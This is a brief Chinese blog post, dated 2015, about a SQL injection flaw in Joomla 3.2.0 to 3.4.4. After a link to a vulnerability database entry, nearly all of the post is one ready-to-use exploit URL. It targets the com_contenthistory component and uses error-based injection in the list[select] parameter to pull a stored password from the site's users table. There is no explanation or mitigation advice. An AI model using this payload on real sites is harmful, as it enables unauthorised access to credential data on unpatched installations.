Joomla 3.2.0 - 3.4.4 无限制SQL注入漏洞

http://www.sebug.net/vuldb/ssvid-89680#0-tsina-1-18081-397232819ff9a47a7b7e80a40613cfe1

 

 

http://10.211.55.3/joomla/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(select 1 from (select count(*),concat((select (select concat(password)) from %23__users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
posted @ 2015-10-24 01:42  Hookjoy  阅读(396)  评论(0编辑  收藏  举报